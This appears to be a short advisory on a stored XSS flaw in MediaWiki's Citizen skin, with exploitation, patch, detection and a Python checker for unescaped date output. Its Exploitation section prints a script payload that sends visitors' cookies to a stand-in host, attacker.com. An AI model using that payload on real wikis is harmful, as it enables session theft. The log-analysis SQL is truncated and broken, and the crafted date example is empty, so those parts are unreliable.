How the CVE Works
The vulnerability arises in the `Citizen` skin for MediaWiki, where user registration date messages (`Language::userDate`) are rendered without proper HTML escaping. An attacker with `editinterface` permissions (but not `editsitejs`) can inject malicious scripts via date-related messages. These scripts execute when other users view the affected profile or registration date. The unescaped output occurs in `CitizenComponentUserInfo.php`, where `userDate` results are directly embedded into raw HTML. For example, a crafted date string like `` would execute in victims’ browsers.
DailyCVE Form
Platform: MediaWiki (Citizen Skin)
Version: >= 3.3.0, < 3.3.1
Vulnerability: Stored XSS
Severity: Moderate
Date: Jun 13, 2025
Prediction: Patch expected by Jun 20, 2025
What Undercode Say:
Exploitation:
1. Payload Injection:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Insert via date message editing.
2. Trigger: Victims loading profiles with malicious dates execute the payload.
Protection:
1. Patch Upgrade:
composer require starcitizentools/citizen-skin:3.3.1
2. Manual Fix: Escape `userDate` output:
echo htmlspecialchars($this->lang->userDate($timestamp, $this->user));
3. Mitigation: Restrict `editinterface` permissions.
Detection:
grep -r "userDate.*html" /path/to/mediawiki/skins/Citizen/
Log Analysis:
SELECT * FROM logging WHERE log_type = 'edit' AND log_ LIKE '%date%';
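A narrower check than the grep in the Detection section, added here as an example (not code from the advisory or the Citizen project): it flags `userDate`-style calls that are not nested inside an escaping call. The escaper allow-list and the sample PHP lines are assumptions constructed for illustration; it is a line-based heuristic and does not parse PHP.

```python
import re

# Calls assumed to HTML-escape their argument (allow-list is an assumption).
ESCAPERS = {"htmlspecialchars", "Html::element"}
# Language methods that return a user-formatted date/time string.
DATE_CALL = re.compile(r"->\s*(userDate|userTimeAndDate|userTime)\s*\(")
CALL_OR_CLOSE = re.compile(r"([\w:]*)\s*\(|\)")


def enclosing_calls(code, pos):
    """Names of the calls whose parentheses are still open at index pos."""
    stack = []
    for m in CALL_OR_CLOSE.finditer(code[:pos]):
        if m.group(0) == ")":
            if stack:
                stack.pop()
        else:
            stack.append(m.group(1))
    return stack


def find_unescaped_dates(php_source):
    """Return (line_no, text) for date calls not nested inside an escaper."""
    hits = []
    for no, line in enumerate(php_source.splitlines(), 1):
        if line.lstrip().startswith(("//", "#", "*", "/*")):
            continue  # skip comment lines
        for m in DATE_CALL.finditer(line):
            if not ESCAPERS.intersection(enclosing_calls(line, m.start())):
                hits.append((no, line.strip()))
                break
    return hits


# Constructed sample lines, not the skin's real source.
SAMPLE = """<?php
// registration date rendered four ways
$a = '<span>' . $this->lang->userDate( $ts, $this->user ) . '</span>';
$b = htmlspecialchars( $this->lang->userDate( $ts, $this->user ) );
$c = Html::element( 'span', [], $lang->userTimeAndDate( $ts, $user ) );
$d = Html::rawElement( 'span', [], $lang->userDate( $ts, $user ) );
"""

if __name__ == "__main__":
    for no, text in find_unescaped_dates(SAMPLE):
        print(f"line {no}: unescaped date output: {text}")
```

Lines it reports still need manual review, since escaping may happen on a later line or in a template.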
Note: All commands assume Linux/env and require validation in target systems.
Sources:
Reported By: github.com